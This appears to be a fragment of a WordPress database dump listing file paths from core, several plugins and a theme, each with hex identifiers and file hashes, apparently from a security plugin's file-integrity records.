(0x75ea17365fdd1d285d76d2856cdcf3cd, 'wp-content/plugins/js_composer/include/autoload/post-type-default-template.php', 0, 0xa978ca9aebb9290ea49f8bfce2402e69, 0xa978ca9aebb9290ea49f8bfce2402e69, 0x0c28d640d3d6399c7ec5ebacaa1c01b8939d799ac8a3c30a9076d60b058d89a1, '', 0, '?'),
(0x75ed0f3aec7aa732a944510b0bc9ef34, 'wp-includes/blocks/tag-cloud.php', 1, 0x00000000000000000000000000000000, 0x54fe9d80c5ba88697c2ea1dd23b4708d, 0x1f23355548df040f0258eaf4ad684e37c5883093b37d9ee7fb01049a9aecc3d2, '', 0, '?'),
(0x75f4cfa792e565a4508ea561c26d12fa, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php', 1, 0x00000000000000000000000000000000, 0xfd98209e12fae000c7dd145e507c2258, 0xf16e4b968e4811ba689871cd062f5a1948b577b81ea8e866afc61389ae907ec4, '', 0, '?'),
(0x75f62fbdcad64ce0e2470c715a47b35e, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg', 0, 0x3b96e78035440254da25c8ba64bba82e, 0x3b96e78035440254da25c8ba64bba82e, 0x14256e06e3c3472641d67858fd53f74b7a092a4d326ad35b19ce2d4d7ceca088, '', 0, '?'),
(0x75f6a517452c8e46322f7b219d2fd2f2, 'wp-content/themes/Impreza/framework/js/jquery.isotope.js', 0, 0x5fb7c19c9c51cfb99f5ff942629f0f21, 0x5fb7c19c9c51cfb99f5ff942629f0f21, 0xe88a07c20a8487ebd1be9b273b53955b6e8800392160bbc7eeb6e07ed2053f7e, '', 0, '?'),
(0x760cdab4a1e5c7d656b9bdd84bb5fa50, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot', 1, 0x00000000000000000000000000000000, 0x06189313e1c7504e1edaa12766c2cfd9, 0x0d5d867e5bb286af90bf9bf75fcbb3be509842ca544160eea9bdc703af2a2c4f, '', 0, '?'),
(0x7610962946bc18db7e027184879c3f62, 'wp-admin/includes/class-plugin-upgrader.php', 1, 0x00000000000000000000000000000000, 0x28ec7dccc69c980ec7f2b5ed356dffb2, 0xeb82f85653e856903ba547e2ffd2760ea17df9b400eeb18163c02aea0b1e8da7, '', 0, '?'),
(0x76158f92c4192b51cd6fc1cf0df50e67, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg', 0, 0x541d74044ac7557ec423da565bffc736, 0x541d74044ac7557ec423da565bffc736, 0x8087435c00f8051f22decb9fa00930b3a0272bf984467ede62d2604340666b31, '', 0, '?'),
(0x761a0753e7f07a4b93bca3239e54cd55, 'wp-content/cache/meta/index.html', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x761d6689d04e78e05a6bcc8a0c46f2d2, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg', 0, 0xedc657ce31c4eab09155d473f40153da, 0xedc657ce31c4eab09155d473f40153da, 0x6ee9c0da9b51ae8c226095a2b054a8f39acc4ad802f8342f5a825850f2832eee, '', 0, '?'),
(0x763af78115c5cc0c255a4f1e62bbbeed, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/dropdown.min.js', 0, 0x5e1cd08bd7c43be20fd86754368ecc25, 0x5e1cd08bd7c43be20fd86754368ecc25, 0x1886136accb110e538750a76ac2f227fddef4e14dd8c805d23235475f895e66e, '', 0, '?'),
(0x763e9405d62e49eb98030e16f86f04f6, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wifi_24px.svg', 0, 0x56a43d07421d6a113285f96755db1941, 0x56a43d07421d6a113285f96755db1941, 0x9c213776b434de56cd3eee8cabcef1f9419be889db5bd6645433f31d367c0d00, '', 0, '?'),
(0x76476f0cf92627152707339f084ede3f, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg', 0, 0xa8dedbcfd9afcf906d64d648ac0350ac, 0xa8dedbcfd9afcf906d64d648ac0350ac, 0x3b6b1d957d04dfab5c76936c7488bbee9580c5caf61f5746434f1144b57379d0, '', 0, '?'),
(0x764b3b0240d173ba6155313ba9095ea9, 'wp-config.php', 0, 0x8c07d4ed4f538857a679deffeacb3bd1, 0x8c07d4ed4f538857a679deffeacb3bd1, 0x68657177bd1fbfd340a02cb87c03981b0b50d3780f3fa7eee7c184045ca28fd9, '', 0, '?'),
(0x764c4d972e66d5ecd4254f071d7f4d52, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php', 1, 0x00000000000000000000000000000000, 0x069b34b902562b143d3f6bc50db2e1cc, 0x5fb6e2de12be783a0ceb6e4f734fa83a060207641dd12700974e3d968cd26be0, '', 0, '?'),
(0x764e8c9f30218dd1536a9cd2ef1d54a1, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pie-chart.svg', 0, 0x1f35081654693303b4ea069ea5c39cb5, 0x1f35081654693303b4ea069ea5c39cb5, 0x7b38eeb6e6781a1a9f8fda9b048ee13ca8591776480a1eeee8a85aea30c37057, '', 0, '?'),
(0x7654d349334ea902277e619330019b65, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_update_24px.svg', 0, 0xe7e44f409910ef6ec841c0dc5e4f95a6, 0xe7e44f409910ef6ec841c0dc5e4f95a6, 0x7cfd2f63d28bc8edcc02239b5871a6528e2ec91313b3e97481c498783dac34d0, '', 0, '?'),
(0x7665d7b65c12b06c2e070f97d185067b, 'wp-includes/js/dist/vendor/wp-polyfill-formdata.js', 1, 0x00000000000000000000000000000000, 0xed823838339ca0f88793fa781fc1e10d, 0xe8b7d158a586ab9706f198728a712dbefe4e172996b56e686cc14c9224bfbfa5, '', 0, '?'),
(0x766999667550e2aa305ef93e64a816d4, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', 1, 0x00000000000000000000000000000000, 0xc2cb53470b05b0cecbba939346bf84c3, 0x5bde2898ae52b88ceae416eb0becf48a24a60fa313326f8de5e37406fb62f7e7, '', 0, '?'),
(0x7677d9d140050f8848cac91e7a9646a6, 'wp-admin/ms-admin.php', 1, 0x00000000000000000000000000000000, 0x9a05b49740dfcdaf4516851b623606e4, 0xc0ce42485416c5dc6043900d8c2316c038dc394acae8e0f74e34120344a20d03, '', 0, '?'),
(0x767f5dbf7a8bf0d4e5039ac333bb7442, 'wp-admin/includes/class-wp-importer.php', 1, 0x00000000000000000000000000000000, 0xcd08dfab22af64b04bbcb7e0d76af6fc, 0x64c7261e1203db4a88a67fac33e49bd84f63fe09b2e267ca3cd282a7cbd3cf87, '', 0, '?'),
(0x7683441d0044e89c12d4e298876ce755, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/javascript-hint.js', 0, 0x2533dc0b779d154e8f3144ae1901a04d, 0x2533dc0b779d154e8f3144ae1901a04d, 0x846293861f879cd1af41be8693104ef0ef7b2ddf21c1527b5f6fad05bc406ca3, '', 0, '?'),
(0x768d05aec54751f9cf36bbc054f20ae2, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_contacts_24px.svg', 0, 0x59e9122d8a95d541abca1d6814330dd4, 0x59e9122d8a95d541abca1d6814330dd4, 0xdcc184d7958087c461b4b4bc5dd6ae3c00a1fdab3e1c9110ba3f7e5fadf44ce8, '', 0, '?'),
(0x769a49cdc1c1b9f14b5d86594c65a8d7, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg', 0, 0x604f1d654d2e7a31de62b9d93b86dff0, 0x604f1d654d2e7a31de62b9d93b86dff0, 0x7a6cd5778bfb49c962bb44ec698a39e12f10a4c1476bfe65ad2104b21659325c, '', 0, '?'),
(0x769e1bdb7e72493ae7b0807df8ba934b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg', 0, 0xa4af9c0b20ec4c54614ffb47a051aaf8, 0xa4af9c0b20ec4c54614ffb47a051aaf8, 0xe4fec0c0b35a7a653b5708a363fbd0695c11b4510b8f2a8102924e067e69e11f, '', 0, '?'),
(0x769e211a08247b4547e6a213e0183906, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/info-box.min.js', 0, 0x2f4908af4f31c7fba00429bc36e6bc6c, 0x2f4908af4f31c7fba00429bc36e6bc6c, 0x7ee99e4684148e8715e41659e68902e924b02d8b9fe011a566d28b79181561fd, '', 0, '?'),
(0x76a19610020cdea303e3fb1d7f5211ef, 'wp-includes/js/jquery/jquery-migrate.js', 1, 0x00000000000000000000000000000000, 0x351c89ef1b09861916f4f022db000832, 0x4fcdad7a85e72528cb73213f2c11c6659e9fb4b3ac0a83f8b4271ac9808fa52b, '', 0, '?'),
(0x76a9001ddbf9e6d0cfa8bd55cb4de865, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_download_24px.svg', 0, 0x2cceeefefaa57c2c819fae5ae49c129e, 0x2cceeefefaa57c2c819fae5ae49c129e, 0x02f4f62f0a07546a2926955af0425124fdb019b940776e7d26c87348810dfab9, '', 0, '?'),
(0x76aba3a9d306bd0e22c7208c0dc32206, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg', 0, 0xa45f4d798a39b05416e74be456710128, 0xa45f4d798a39b05416e74be456710128, 0xf894d6d26f6abdf44c5629d81366dd01ed5868137f63a862e5151779fa51a6ef, '', 0, '?'),
(0x76af3b52b479633edbd229921ab559ae, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_disabled_24px.svg', 0, 0x1877b5c9ba4f19f208bada196e97c1ed, 0x1877b5c9ba4f19f208bada196e97c1ed, 0xd615bdf213365693fb8630c3ca560912c822b5a427bf9ce6ee3f37a65885361d, '', 0, '?'),
(0x76c3a22c5c13ad2b51b9e5d5dbf1d6a7, 'wp-admin/css/l10n-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xc14f53b547661c4be7bd9a8e38dcdb5d, 0xad64f27891b9f16b3372fec1deb056034ec4aa856581fc7490b32dfca083dcdf, '', 0, '?'),
(0x76e247822ec267b741f5c62306f572e9, 'wp-admin/images/align-right-2x.png', 1, 0x00000000000000000000000000000000, 0x6883026cbd3e72ba5da36c57c60fc078, 0xa4561c3af00b1368afc1c623c8864254d6356900a53f84f963c04263e184f4dd, '', 0, '?'),
(0x76e6fce1e234dd7c3e1ded3cb4ffc0a8, 'wp-admin/js/xfn.js', 1, 0x00000000000000000000000000000000, 0xf715e9cd03d570820eb81c2990a2b70b, 0xbe762a4bd43a9caa07bd18090382de527a6fa96b910fb8de4d3c2f16db6bcf2b, '', 0, '?'),
(0x76ed2a8d826718b8df31f9df2c827918, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg', 0, 0xb096f0da76cb90cda6463183c7383f10, 0xb096f0da76cb90cda6463183c7383f10, 0xc9a7624ebd3dcd2ccb67ea3872f609284dab8da2586a4f8fe541e360738fc013, '', 0, '?'),
(0x76f07b23bfb96c9a936200167dd3e342, 'wp-admin/css/colors/light/colors.css', 1, 0x00000000000000000000000000000000, 0xe1d733902309caf84b473f3d0ac2d846, 0x3e6dbe35816ff210993993ad44062e90570311712275efe7075878b3248af226, '', 0, '?'),
(0x76fad2b8293b8f44b08d7e4a22e08f71, 'wp-includes/js/jquery/jquery.form.js', 1, 0x00000000000000000000000000000000, 0xd08a6e3d69ffe1088166ae1983e2355d, 0xfe35195cb0273d1627a42a6d03252c15a87f6b431b213cb8f7853283146d3deb, '', 0, '?'),
(0x7704f48300ed073a7ad057e82f25117a, 'wp-content/themes/Impreza/framework/templates/elements/image.php', 0, 0x6259f2e8db57badd5bfba71271210886, 0x6259f2e8db57badd5bfba71271210886, 0xd1c2e5773c2a1b2a2fc22956424724df9ecb7e24cd71987554619c5b38149b10, '', 0, '?'),
(0x770b786edd3095ddead31a99a9a6e97a, 'wp-content/plugins/Ultimate_VC_Addons/admin/product-license.php', 0, 0x54af66d16e310aeae00d21be4ea5a779, 0x54af66d16e310aeae00d21be4ea5a779, 0xed9de123ed408ed0aaa71da46ca3bab4dfec47aaf056ecdd2b150b85c250b89a, '', 0, '?'),
(0x770c36bd64f1c2ba62064c10e34febe0, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php', 0, 0xb557c03886c5ca38245e30decae21133, 0xb557c03886c5ca38245e30decae21133, 0x7ceae04501a4316366e4095f347295c76e0e38b9919fc93dd3420e1ca5fe8c84, '', 0, '?'),
(0x771075e89a6c7ce50cf570089816ca51, 'wp-includes/js/autosave.min.js', 1, 0x00000000000000000000000000000000, 0x1ea6e59d88f83106e2ae3aff299d35df, 0x0647bcb78d177217689f91dad9db69994a391c06159702bfec12f54eff1575d3, '', 0, '?'),
(0x77193af65a263f1a1636eaec1214769a, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_paused_24px.svg', 0, 0x8ba1c06b5deb67ab4748d1f2d3762b8a, 0x8ba1c06b5deb67ab4748d1f2d3762b8a, 0xdd35544c796bf013937aae4c1bf563360921b3064edeac829b0522a22cc4d3b8, '', 0, '?'),
(0x772ac29fe4faa9bc6a25c8fddcfbc728, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_24px.svg', 0, 0x3c4d073754797e4f844a69b8a46f0114, 0x3c4d073754797e4f844a69b8a46f0114, 0xffcda80569e59467ce90674f85b17838f5866cbce5b1f6c4b50794aecd04a280, '', 0, '?'),
(0x7744491d9aab2d45f21f9d49d7166ce5, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php', 1, 0x00000000000000000000000000000000, 0x1854be9a25f6613b42333e7c4358fdae, 0x423b2cc8798d905fd63aa02419b2c806cfc7e4b5111eec4535a89c423084c800, '', 0, '?'),
(0x774f85b17591ad44c37de92f6e17c4ed, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg', 0, 0x57ce208972f5ce72b8ffea63860eb6ca, 0x57ce208972f5ce72b8ffea63860eb6ca, 0x870d1c5e877ef983a9942d42f6cb42774d9e96470b1f9f2274b8cc261ba3c458, '', 0, '?'),
(0x7752d668bbc09235fb1dde31fb371632, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/assets/js/jquery-history.js', 0, 0xbc11e3a60761a44c474e121e75a19f2a, 0xbc11e3a60761a44c474e121e75a19f2a, 0x42dcea26c9791dac24548a148c035dc3dfdf4ad8f3323f97ab519e21542d219e, '', 0, '?'),
(0x77651dfcdc6a16ff5af4f571b2490fc3, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php', 1, 0x00000000000000000000000000000000, 0x1c28af2c83a094beaf45da8ee6860e3b, 0x352b18fa53ef73590c073e25f372399637e49635185b49e93dc4603c324de7c7, '', 0, '?'),
(0x7777656c6d839aad9d17a064d7e3aee9, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg', 0, 0xd318c44b9a7bd257c792e1fbdc9f6b9e, 0xd318c44b9a7bd257c792e1fbdc9f6b9e, 0xbb91dad841765c96ab4707552396d8dde4744220995fbc748e374853b62cb367, '', 0, '?'),
(0x778331a0427bd10ad92de61f449f493f, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg', 0, 0x7e410f27afac20ad8c881bf78ab90411, 0x7e410f27afac20ad8c881bf78ab90411, 0x55926a96d37331a4c10acf3db1b92c066a680b12f55b237905e4e042088b9786, '', 0, '?'),
(0x778784301592aa96de1e16384758d776, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg', 0, 0xcadce83706d98e329d694efe027db320, 0xcadce83706d98e329d694efe027db320, 0x222a21bee7cf992a4572f74db6b75b39bb66b57f93fe2e2a10dd83853842f4bc, '', 0, '?'),
(0x77a3a4ef4cfdeaa3301e9ceff05d722e, 'wp-includes/images/crystal/code.png', 1, 0x00000000000000000000000000000000, 0x1460ef31b2cffaef1cb012f531ae391f, 0x3beaa9363798a483940dd8218aeddbe71e781a5f104048d7c3264394d02dd7e3, '', 0, '?'),
(0x77a740cf49a965c6dc52b266f937d9c5, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php', 1, 0x00000000000000000000000000000000, 0x04b99b138281688c1c140452b480e0ac, 0xa7fcf63df66d48fcd52f7f12a810040a15651cdbfdeb1e43a68f33d875353882, '', 0, '?'),
(0x77a97a892e4049127a0317139bfe76bf, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg', 0, 0x5e71b6c27e527b2032c7cfec571eeb75, 0x5e71b6c27e527b2032c7cfec571eeb75, 0xb316c4a904a37aca8d096b1a12799d631a4ad30915f5b28af7d17b20365a20c4, '', 0, '?'),
(0x77acc3635528f93628c547939a07533d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user08.svg', 0, 0x4060d75731ae78f1d93bc399781773bf, 0x4060d75731ae78f1d93bc399781773bf, 0x94fd5f99c5c97f5b16667cc03ec60ce86db83e530ae88e0091ccc74a14d08de8, '', 0, '?'),
(0x77ae15f4604d0ccbe13ec77bd40f83b4, 'wp-admin/includes/noop.php', 1, 0x00000000000000000000000000000000, 0x58d3716a0616a4f682d11a21f10d3ab4, 0x641ecb8e4a8da999c1a1e6d41798505b0a3d16be0c8a5163ab82ae991850de0b, '', 0, '?'),
(0x77bb52d2be1d7a272a136d330b409964, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg', 0, 0x64b29140c5910ac6f262b7aaf0ef32b9, 0x64b29140c5910ac6f262b7aaf0ef32b9, 0x1479800965094dff8e077469d95b78148053e3ebc72ef58e242e33162770da46, '', 0, '?'),
(0x77c38bf4ed07ca390b2f132c2b31fd82, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php', 1, 0x00000000000000000000000000000000, 0x821267dbb02f2ab18206c8432c6b2390, 0x6176050c147875ab8bed9db66aa6191bab3d9e49a253b6d1447b91f9dec19221, '', 0, '?'),
(0x77d78d5b222065cebf70938ddbf2e13e, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/tabs-accordion.min.js', 0, 0xeb075e58035ececcb92ed59412a57d37, 0xeb075e58035ececcb92ed59412a57d37, 0x763945c2e3dc59a6679a7c754947f899aaf75a710d488d127cf94b7be572173e, '', 0, '?'),
(0x77d798b622becba76538cd53fe26546d, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_video_library_24px.svg', 0, 0x47af352ebe6e4f1a624e9dd2c57546d7, 0x47af352ebe6e4f1a624e9dd2c57546d7, 0x7c1aa42889ed08eb431e03766b6eac98f25757f455be2eb243b7e2d45b6f6021, '', 0, '?'),
(0x77fdfadaf2e1ca3a027d1956b910bc50, 'wp-admin/js/common.js', 1, 0x00000000000000000000000000000000, 0x6925251401e3b9e69ef7950fdb34c6e9, 0x8145ef8254afdfe31b80d50c35bf026770cb31fc8c8edcb1a33b8985f85d8132, '', 0, '?'),
(0x780947214ee4b724a52e9a648e5462ef, 'wp-includes/ID3/module.audio-video.flv.php', 1, 0x00000000000000000000000000000000, 0xf7ef572f85f862b2dff188eee78bd79d, 0x8336a31a044270a68d7a0f08778e40f2fd30ea4576d301e0e3ab6d4315389f31, '', 0, '?'),
(0x780e11df862b3f3571903254990b0799, 'wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php', 0, 0xc311cabe618ece7747549d00d16e73b6, 0xc311cabe618ece7747549d00d16e73b6, 0xf0769c96b5d61186714f08bf89e9dae37026887fd1eae653465e60c130135e0e, '', 0, '?'),
(0x7810ddfea6b857f8a94fc39194756d7e, 'wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg', 0, 0x3b31e1de93290779334c84c9b07c6eed, 0x3b31e1de93290779334c84c9b07c6eed, 0xd541860921ccdf1bdeaee1e179387458f277373f2f60612fb33c0c7342fe1f35, '', 0, '?'),
(0x7839405e16369cc5df91acf39f6fb7e8, 'wp-includes/images/w-logo-blue.png', 1, 0x00000000000000000000000000000000, 0xfd5b4eb05706a2f05f707fe077ae1030, 0xdea35e519074e4330103f4489d1c756e0155e29dbbc9e07e05b2271202bb5432, '', 0, '?'),
(0x783c1d238875552df1d7303e74f19e9a, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_video_banner.php', 0, 0xa87ea405450057e3be93491b37fcaa9c, 0xa87ea405450057e3be93491b37fcaa9c, 0x6c77af628dde288919b5ae6cb1eb3cb908dc385eb1e4af4e9b82684a8b89f89b, '', 0, '?'),
(0x7849061d48de2e9439945915c3e0424f, 'wp-admin/css/colors/coffee/colors.scss', 1, 0x00000000000000000000000000000000, 0x397e3820b27a234330c95e05250f61ce, 0x007bb55aa3727e819864307c42a5dc7c5dd784c8f96ab6dadc8ce1b64982783e, '', 0, '?'),
(0x784c4b7820969632b8af4973f2212351, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php', 1, 0x00000000000000000000000000000000, 0xce0d0e9755a18a14f6d602fdda434222, 0x831dfa294da31506a695eca982741b55cae4afceb408d5d4aadbf9afcc462efc, '', 0, '?'),
(0x7856824d9ae93e966ed97b4f96c79f11, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php', 1, 0x00000000000000000000000000000000, 0x39364eab9b1a21b5d14a8c598c9c9555, 0xa92c799f53bf17aeccc93195cca50b3b78869eb535af1ba0478cc36990084f39, '', 0, '?'),
(0x78788ea304a2ba20281856ab15920856, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_portrait_24px.svg', 0, 0x120c393518ef5499f5fb249cd8418e2f, 0x120c393518ef5499f5fb249cd8418e2f, 0x7f1f58e497c505a441becdde6aefa671721526786040c5b3bc76634c6bb8ba35, '', 0, '?'),
(0x787997210ee0f8f471c129f62ecb8922, 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif', 1, 0x00000000000000000000000000000000, 0xce6d8e848695cd9fca08e472d1d62039, 0x073b09d15ff659efe0b7ed748a374bdf161dd57397956d43f8de0de5e0caee6f, '', 0, '?'),
(0x78965e6ddd5dccb29a2ff5c54c347655, 'wp-admin/includes/revision.php', 1, 0x00000000000000000000000000000000, 0xe9447d9dd3085530cb09e5fe232c0fdd, 0xc53832bc182c6c91c8ae6d70e651660f99333da9cddd2a498bb28a8b5bb54d8f, '', 0, '?'),
(0x78ba2916b9063da1de448286756df11d, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js', 0, 0xeef3586dc71eb0bbc18df0ae9d81b91e, 0xeef3586dc71eb0bbc18df0ae9d81b91e, 0x3706706dbaec67447e0cef7120a773b1ab94f86864941a6c2c66a538b43943cc, '', 0, '?'),
(0x78c2fa675b76467eb7a8b0372719989a, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg', 0, 0x8bede02fcd4c7411efa0963b216bd2be, 0x8bede02fcd4c7411efa0963b216bd2be, 0x464c455110463362f4610d4aa924c68f144c04cc192f14bd97accfa8e93c32bf, '', 0, '?'),
(0x78c77dbe77f45ee9c8c81f0560defb8b, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_sticky_section.php', 0, 0x1e7419c1f3f50534f741d33bddf18767, 0x1e7419c1f3f50534f741d33bddf18767, 0xcc73920f0c86d9a634d6c9fa76f60e515bf93893585d18aa8aa9074d7226997d, '', 0, '?'),
(0x78eb8d82829f407d59c7038c69cb2b7f, 'wp-includes/js/tinymce/plugins/tabfocus/plugin.js', 1, 0x00000000000000000000000000000000, 0xa699cf8ec50c40ef2f404dfc6df34ed9, 0x9e780e4d919427c8a493e7b43dcedab7a63f248a7f03532c104679b884a5d6a5, '', 0, '?'),
(0x78ef7a23e85d94728c753f309fae4ff9, 'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php', 1, 0x00000000000000000000000000000000, 0x901e68df0c8bd51b6760c9b83ada955e, 0xbd0e959f01462f51b04800f9a6e65e126c2030a142ce93d5ab0b3653405068eb, '', 0, '?'),
(0x78fc20d3c66d4346758a43c76ca12677, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_24px.svg', 0, 0x8b6c7812ba9efab131f916bdf12566f6, 0x8b6c7812ba9efab131f916bdf12566f6, 0xca18b448cbf290611ff127e7329ab49520965cc2529b941946b00dd4ddb4322d, '', 0, '?'),
(0x790c8aad813189e22de8862f6649d7a0, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', 1, 0x00000000000000000000000000000000, 0xcae330390d81c9986197640bb7a3f850, 0x462a154fe0d09e715eca6cd7ca677ab7828f2c493fd462ce52ef5d4bc2d6b345, '', 0, '?'),
(0x791ca15e621a86820254811c6bd59151, 'wp-content/plugins/js_composer/include/params/autocomplete/autocomplete.php', 0, 0xd8698eeee3bb942f5e9547b711538032, 0xd8698eeee3bb942f5e9547b711538032, 0xef334678a86f08a6a3ed8bc86cf7e261bdc81e680db4354ab00d0207994c597d, '', 0, '?'),
(0x792645d97a16dd9c995abd79d7badab2, 'wp-includes/class-wp-recovery-mode-key-service.php', 1, 0x00000000000000000000000000000000, 0x12b99765c3e72389fde5109337804886, 0xdf0e7de7fd6c66c7ccf8e6ecfc547ca559bc73a287dd04c359e655ddcdcf8323, '', 0, '?'),
(0x7927f34ca4a62e6548c6aa3c1fef8a76, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg', 0, 0x7bf1755777e18bcc1edc9858ba4e9f99, 0x7bf1755777e18bcc1edc9858ba4e9f99, 0xaa03af42d6e12bd077994f1952e6ba2ef8a7d790e25a3b057704ff3a7cebe60f, '', 0, '?'),
(0x792a7a8ece873e64c6d8455c36f3fbf5, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.po', 1, 0x00000000000000000000000000000000, 0xbcd0e40fb98afc53cd60e9c249d31a8e, 0x6cb0bb3e4cde263df4cd09048b0a8f07639b4f38d4b9f8775f76ed80af019386, '', 0, '?'),
(0x792df43f6204aebb1e9f4eac205ff5ad, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg', 0, 0xb3750c74204f1806b8a0bd66065bff2d, 0xb3750c74204f1806b8a0bd66065bff2d, 0xc38a4bf889be0c8634639c23d4323f7c56cc1294ab529c0a4f1fb12d3ed7a27b, '', 0, '?'),
(0x79351b32a46d1da300a56c991d22f965, 'wp-includes/js/dist/priority-queue.js', 1, 0x00000000000000000000000000000000, 0x9ec356d434b7a09e112bf1c086b7bfb4, 0xe1999184b2c3cd304ca2cf7345f4b74ff16ce11ce7808b87374bfe8d7413ff4b, '', 0, '?'),
(0x794116a98730bba695587a28809e275c, 'wp-admin/js/widgets/media-gallery-widget.min.js', 1, 0x00000000000000000000000000000000, 0xa8a1e7473d3a063c4e783d0bc44ec83d, 0xa88db1c028171cc82a8812ca44512a4cd9b49c440bceabf7fe48a66d30bd66e0, '', 0, '?'),
(0x7943a7d0613a1c73f95d104f4f2c12d6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg', 0, 0x9b47272854acdc46c322f9ab8eab8a4f, 0x9b47272854acdc46c322f9ab8eab8a4f, 0xb58fe204030ea527f10cf54455e82b9e80b3fae1d2a5a75912bbd44202143827, '', 0, '?'),
(0x794f9e0079166af965420a5670c8fbf0, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php', 1, 0x00000000000000000000000000000000, 0x9645edafb7e483c6806bfc766ba2a50d, 0xf0be020c8aa56969104c4dbb50a0b5ac34daf6dea84f5f21fccdf893694e09bb, '', 0, '?'),
(0x796006c694e1f78a2218466fb5dd0611, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_download_24px.svg', 0, 0x54ff07afd137c55f746e332c03fd678f, 0x54ff07afd137c55f746e332c03fd678f, 0x913764e29fc1643d6a70689ac60c1b1ba7b7d502615c1de0282fceaeb406dba2, '', 0, '?'),
(0x79646eabaf72d630fd20f78a9e1b276b, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_icon_timeline.php', 0, 0x1d5e313d593c874c34fb1b54934d4846, 0x1d5e313d593c874c34fb1b54934d4846, 0x30913b8326b6ad5cbbf692269dcd8a10d6a21ee96608a1c75f8758b346b37fdc, '', 0, '?'),
(0x797fd0dd94564cf0a37cabfbeed8b40e, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Radio_Image.php', 0, 0x3bacf7bc7e37e21c4bf1e9d933710f3d, 0x3bacf7bc7e37e21c4bf1e9d933710f3d, 0xf9fac667a0b5eca76c3205050e452dbd08ac5e348a272d29034c8375573bdb37, '', 0, '?'),
(0x798102d70a962c0a43e77c5b69100616, 'wp-includes/customize/class-wp-customize-selective-refresh.php', 1, 0x00000000000000000000000000000000, 0x2cec20d4643211bb598f8fb0bb5e817a, 0xca9d519be54d58a19e61662fbfc2604da5f09a73d6c7e3d3a18f41e6ae47e2e2, '', 0, '?'),
(0x798bcef95ff8644d0a05eab09ddb01a1, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/plugin-installer/admin-functions.php', 0, 0x117208bace75268b3e2e863f794c9945, 0x117208bace75268b3e2e863f794c9945, 0xb2b1782f53b11d235f4572d108ec61c17065f408def8e53ff87cadba1c945fdd, '', 0, '?'),
